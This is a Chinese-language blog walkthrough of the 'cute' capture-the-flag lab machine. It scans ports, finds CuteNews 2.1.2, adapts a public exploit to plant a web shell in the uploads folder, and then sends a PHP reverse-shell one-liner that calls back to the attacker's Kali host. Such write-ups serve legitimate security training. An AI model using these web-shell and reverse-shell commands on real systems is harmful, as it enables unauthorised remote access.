cute

环境准备

将靶机导入后将网络设置为NAT
image
kali:192.168.0.102
cute:192.168.0.107

端口扫描

使用nmap对靶机进行端口扫描

nmap –A –p- 192.168.0.107

image
扫描结果显示,靶机开放了22、80、88、110、995等端口。
访问其80端口
image
利用dirsearch扫描目录
image
访问index.php
image
是CuteNews搭建的版本为2.1.2,寻找其公开漏洞
image
修改exp中的代码,去掉CuteNews目录,因为靶机中安装在网站根目录
image
制作反弹shell
image
kali监听本地6666端口
image
反弹成功。

提权

先sudo -l 查看当前权限
image
发现用户hping3,尝试提权。
提权失败,换一个思路。
通过简单的切换目录命令,发现无法切换目录,根据exp找到shell文件,在uploads目录下。
image
image

http://192.168.0.107/uploads/avatar_D2CggyKQYt_D2CggyKQYt.php?cmd=id

image
接下来反弹shell

192.168.0.107/uploads/avatar_D2CggyKQYt_D2CggyKQYt.php?cmd=php -r'$sock=fsockopen("192.168.0.102",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

反弹成功
image
开启python简单http服务:
image
提升为交互式shell

python3 –c 'import pty;pty.spawn("/bin/bash")'

不能提权,直接读取flag
image

posted @ 2021-09-24 12:03  朝朝_暮暮  阅读(347)  评论(0)    收藏  举报